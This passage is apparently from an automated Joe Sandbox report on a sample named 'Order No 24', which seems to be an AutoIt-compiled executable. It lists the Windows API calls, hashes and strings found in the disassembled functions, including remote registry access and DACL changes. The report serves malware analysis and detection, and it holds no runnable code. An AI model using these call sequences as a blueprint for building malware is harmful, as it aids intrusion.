                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE783
                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 009EE78C
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE79B
                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 009EE7A4
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE7AB
                                                                                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009EBEF4,?,?,00000000,?), ref: 009EE7BC
                                                                                                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00A0D9BC,?), ref: 009EE7D5
                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 009EE7E5
                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 009EE809
                                                                                                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 009EE834
                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 009EE85C
                                                                                                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009EE872
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3840717409-0
                                                                                                                                  • Opcode ID: 0d0e4dd9958a56ed702592ed4402245d056587ea6a22a451a5e3cf64a056e4c8
                                                                                                                                  • Instruction ID: fbf30fd0daefdcab56aff4e7fea249a81101722125618741366e5a6fad6fd350
                                                                                                                                  • Opcode Fuzzy Hash: 0d0e4dd9958a56ed702592ed4402245d056587ea6a22a451a5e3cf64a056e4c8
                                                                                                                                  • Instruction Fuzzy Hash: F9414A76600209FFDB11DFA5DC88EAA7BB8EF89715F108458F90AD7260D7319D42CB20
                                                                                                                                  APIs
                                                                                                                                  • __wsplitpath.LIBCMT ref: 009D076F
                                                                                                                                  • _wcscat.LIBCMT ref: 009D0787
                                                                                                                                  • _wcscat.LIBCMT ref: 009D0799
                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009D07AE
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D07C2
                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 009D07DA
                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 009D07F4
                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 009D0806
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                  • String ID: *.*
                                                                                                                                  • API String ID: 34673085-438819550
                                                                                                                                  • Opcode ID: 36cb35beb727fd31c635ed354a77f22a3e82816b036c5c23c7e3b4291ec9eb91
                                                                                                                                  • Instruction ID: a9895991b9ed2b37a141578608eae015e0daf0c1e6b5c612cd0d10f6ea2d0810
                                                                                                                                  • Opcode Fuzzy Hash: 36cb35beb727fd31c635ed354a77f22a3e82816b036c5c23c7e3b4291ec9eb91
                                                                                                                                  • Instruction Fuzzy Hash: 15817A725443019FCB24EF64C845A6EB7E8ABD8304F58CD2FF889C7351EA34E9558B92
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009EEF3B
                                                                                                                                  • GetFocus.USER32 ref: 009EEF4B
                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 009EEF56
                                                                                                                                  • _memset.LIBCMT ref: 009EF081
                                                                                                                                  • GetMenuItemInfoW.USER32 ref: 009EF0AC
                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 009EF0CC
                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 009EF0DF
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 009EF113
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 009EF15B
                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009EF193
                                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 009EF1C8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                  • String ID: 0
                                                                                                                                  • API String ID: 1296962147-4108050209
                                                                                                                                  • Opcode ID: 65f18f295af33989838b6a71dfd264268537ad7ff11de3b24caf054d88890add
                                                                                                                                  • Instruction ID: 369ed231cf425bd431491737d84534d23c80ce5b8ef20d0308eea3c5d6fb61f6
                                                                                                                                  • Opcode Fuzzy Hash: 65f18f295af33989838b6a71dfd264268537ad7ff11de3b24caf054d88890add
                                                                                                                                  • Instruction Fuzzy Hash: 27819F71608345EFDB11CF56C894A6BBBE9FB88314F00492EF99897291D731DD06CB92
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 009BABD7
                                                                                                                                    • Part of subcall function 009BABBB: GetLastError.KERNEL32(?,009BA69F,?,?,?), ref: 009BABE1
                                                                                                                                    • Part of subcall function 009BABBB: GetProcessHeap.KERNEL32(00000008,?,?,009BA69F,?,?,?), ref: 009BABF0
                                                                                                                                    • Part of subcall function 009BABBB: HeapAlloc.KERNEL32(00000000,?,009BA69F,?,?,?), ref: 009BABF7
                                                                                                                                    • Part of subcall function 009BABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 009BAC0E
                                                                                                                                    • Part of subcall function 009BAC56: GetProcessHeap.KERNEL32(00000008,009BA6B5,00000000,00000000,?,009BA6B5,?), ref: 009BAC62
                                                                                                                                    • Part of subcall function 009BAC56: HeapAlloc.KERNEL32(00000000,?,009BA6B5,?), ref: 009BAC69
                                                                                                                                    • Part of subcall function 009BAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,009BA6B5,?), ref: 009BAC7A
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 009BA8CB
                                                                                                                                  • _memset.LIBCMT ref: 009BA8E0
                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 009BA8FF
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009BA910
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 009BA94D
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009BA969
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 009BA986
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 009BA995
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009BA99C
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 009BA9BD
                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 009BA9C4
                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 009BA9F5
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009BAA1B
                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 009BAA2F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3996160137-0
                                                                                                                                  • Opcode ID: fe48a449652a4b41683c138cd50b93e7fce95ad0ea456cb30e89e36227d99424
                                                                                                                                  • Instruction ID: 7c0e30f274911eaec0af161b7ccc8d84be0a8dfc2e8f70fcf0be4b2dabbbef34
                                                                                                                                  • Opcode Fuzzy Hash: fe48a449652a4b41683c138cd50b93e7fce95ad0ea456cb30e89e36227d99424
                                                                                                                                  • Instruction Fuzzy Hash: 16512B71900219AFDF14DFD4DE85AEEBBBAFF44310F048129F916A7290DB359A06CB61
                                                                                                                                  APIs
                                                                                                                                  • GetDC.USER32(00000000), ref: 009D9E36
                                                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009D9E42
                                                                                                                                  • CreateCompatibleDC.GDI32(?), ref: 009D9E4E
                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 009D9E5B
                                                                                                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009D9EAF
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 009D9EEB
                                                                                                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009D9F0F
                                                                                                                                  • SelectObject.GDI32(00000006,?), ref: 009D9F17
                                                                                                                                  • DeleteObject.GDI32(?), ref: 009D9F20
                                                                                                                                  • DeleteDC.GDI32(00000006), ref: 009D9F27
                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 009D9F32
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                  • String ID: (
                                                                                                                                  • API String ID: 2598888154-3887548279
                                                                                                                                  • Opcode ID: 17d8d7d7f710f42d69b1792be09426f0f08ccd1bfba57cf6cb99d0314208d9f6
                                                                                                                                  • Instruction ID: ee83348edda8e67dfe173b9f91aff375f7f7aecc85fd605978ae648c9f2c58ef
                                                                                                                                  • Opcode Fuzzy Hash: 17d8d7d7f710f42d69b1792be09426f0f08ccd1bfba57cf6cb99d0314208d9f6
                                                                                                                                  • Instruction Fuzzy Hash: C0513B76940309AFCB14DFA8D885EAEBBB9EF48310F14851EF95A97350C735A941CB60
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                  • API String ID: 2889450990-2391861430
                                                                                                                                  • Opcode ID: 03896a8e3ca2a985560eb69ef0f913368761dac0e170933e9b1cb24a9ab71d2b
                                                                                                                                  • Instruction ID: d2be4fa80fffaa7609bbb8058a81da665d59d1e0fc8d86a6851dc4316e6cc89f
                                                                                                                                  • Opcode Fuzzy Hash: 03896a8e3ca2a985560eb69ef0f913368761dac0e170933e9b1cb24a9ab71d2b
                                                                                                                                  • Instruction Fuzzy Hash: 52516B72800509BACB15FBE0CD46FEEBB78AF85304F10056AF505721A2EB316E99DB61
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LoadString__swprintf_wprintf
                                                                                                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                  • API String ID: 2889450990-3420473620
                                                                                                                                  • Opcode ID: db43995b549c823ee640b5623b518a6ebc97ed14fe3c5ff76048773b273ac32a
                                                                                                                                  • Instruction ID: 5c5e5b72a82603096281f48ecdbe3c16fa932c06ebc61937ea398f7ef75c3fe2
                                                                                                                                  • Opcode Fuzzy Hash: db43995b549c823ee640b5623b518a6ebc97ed14fe3c5ff76048773b273ac32a
                                                                                                                                  • Instruction Fuzzy Hash: C7517C72800609BACB15FBE0CD46FEEBB78AF44340F100469F50972192EA356E99DB61
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009C55D7
                                                                                                                                  • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 009C5664
                                                                                                                                  • GetMenuItemCount.USER32(00A41708), ref: 009C56ED
                                                                                                                                  • DeleteMenu.USER32(00A41708,00000005,00000000,000000F5,?,?), ref: 009C577D
                                                                                                                                  • DeleteMenu.USER32(00A41708,00000004,00000000), ref: 009C5785
                                                                                                                                  • DeleteMenu.USER32(00A41708,00000006,00000000), ref: 009C578D
                                                                                                                                  • DeleteMenu.USER32(00A41708,00000003,00000000), ref: 009C5795
                                                                                                                                  • GetMenuItemCount.USER32(00A41708), ref: 009C579D
                                                                                                                                  • SetMenuItemInfoW.USER32(00A41708,00000004,00000000,00000030), ref: 009C57D3
                                                                                                                                  • GetCursorPos.USER32(?), ref: 009C57DD
                                                                                                                                  • SetForegroundWindow.USER32(00000000), ref: 009C57E6
                                                                                                                                  • TrackPopupMenuEx.USER32(00A41708,00000000,?,00000000,00000000,00000000), ref: 009C57F9
                                                                                                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009C5805
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3993528054-0
                                                                                                                                  • Opcode ID: 3186b1d00fc4446fdd89e3aedfc5ee0ee0c7c61773e761f5eeb69e484d70f914
                                                                                                                                  • Instruction ID: 1694ae4dcb91ffba33a1ccd35ace7fcbdba3c28fd9514474dbd0f09b328aa48a
                                                                                                                                  • Opcode Fuzzy Hash: 3186b1d00fc4446fdd89e3aedfc5ee0ee0c7c61773e761f5eeb69e484d70f914
                                                                                                                                  • Instruction Fuzzy Hash: BC71F471A40A09BFEB209B54CD49FAABF69FF40368F250209F518AA1D1C7717C90DB92
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 009BA1DC
                                                                                                                                  • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009BA211
                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009BA22D
                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009BA249
                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 009BA273
                                                                                                                                  • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 009BA29B
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009BA2A6
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 009BA2AB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
                                                                                                                                  • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                  • API String ID: 1687751970-22481851
                                                                                                                                  • Opcode ID: 511fcbaeac0aeed9285eaefacf36d3143aa9426fb9c092f34871d0562f3881ef
                                                                                                                                  • Instruction ID: 703979713b5aedd512b4a86f851bfd9901dbd61e039a3d3507105a3eaad16b69
                                                                                                                                  • Opcode Fuzzy Hash: 511fcbaeac0aeed9285eaefacf36d3143aa9426fb9c092f34871d0562f3881ef
                                                                                                                                  • Instruction Fuzzy Hash: 7141E676C1062DAADB11EFE4DC85EEDB7B8BF44310F004469F815A72A1EB709E05CB90
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                  • API String ID: 3964851224-909552448
                                                                                                                                  • Opcode ID: a0a83c65d341fe9fea16ce13c1e4fdfc9863519daf604cd6b45aaf80325adb02
                                                                                                                                  • Instruction ID: 4649a98ed83e7d52198371be860b1c480b3133cf7e7b3e19d0bb98f6d57832bf
                                                                                                                                  • Opcode Fuzzy Hash: a0a83c65d341fe9fea16ce13c1e4fdfc9863519daf604cd6b45aaf80325adb02
                                                                                                                                  • Instruction Fuzzy Hash: 08414D3051028A9BDF01EF15DC55AEA3369BFA6340F508858FCD65B392EB71EE4ACB50
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009F36F4,00000010,?,Bad directive syntax error,00A1DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 009C25D6
                                                                                                                                  • LoadStringW.USER32(00000000,?,009F36F4,00000010), ref: 009C25DD
                                                                                                                                  • _wprintf.LIBCMT ref: 009C2610
                                                                                                                                  • __swprintf.LIBCMT ref: 009C2632
                                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009C26A1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                  • API String ID: 1080873982-4153970271
                                                                                                                                  • Opcode ID: cc2dca5180c8ed8131c6dfea0b4616fe2fb23f65d1b3d6924c8bc1d20ccb7f6c
                                                                                                                                  • Instruction ID: b5c0463ef9b926ad9d378b6c52c79dee850257cdb7616e8fde12a6ee4a0c74f9
                                                                                                                                  • Opcode Fuzzy Hash: cc2dca5180c8ed8131c6dfea0b4616fe2fb23f65d1b3d6924c8bc1d20ccb7f6c
                                                                                                                                  • Instruction Fuzzy Hash: CC215E7280021EBFCF11FB90CC4AFEE7B79BF18304F00485AF505661A2DA71A619DB61
                                                                                                                                  APIs
                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 009C7B42
                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 009C7B58
                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 009C7B69
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 009C7B7B
                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 009C7B8C
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                  • Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: SendString
                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                  • API String ID: 890592661-1007645807
                                                                                                                                  • Opcode ID: bc4ab31c37ecbf16c856a7ded55865d4a1d54abf0725331b24bd1a77e18e4cac
                                                                                                                                  • Instruction ID: df087efa814d35ce8d9a8fb8984f2010dde3a4f56e96c9dadc6170ea029750b9
                                                                                                                                  • Opcode Fuzzy Hash: bc4ab31c37ecbf16c856a7ded55865d4a1d54abf0725331b24bd1a77e18e4cac
                                                                                                                                  • Instruction Fuzzy Hash: 1B1194E2A542597ADB20F7A5CC4AEFFBA7CFBD1B10F0008197411A61D1DA605E49CAB1
APIs
• timeGetTime.WINMM ref: 009C7794
  • Part of subcall function 0099DC38: timeGetTime.WINMM(?,7694B400,009F58AB), ref: 0099DC3C
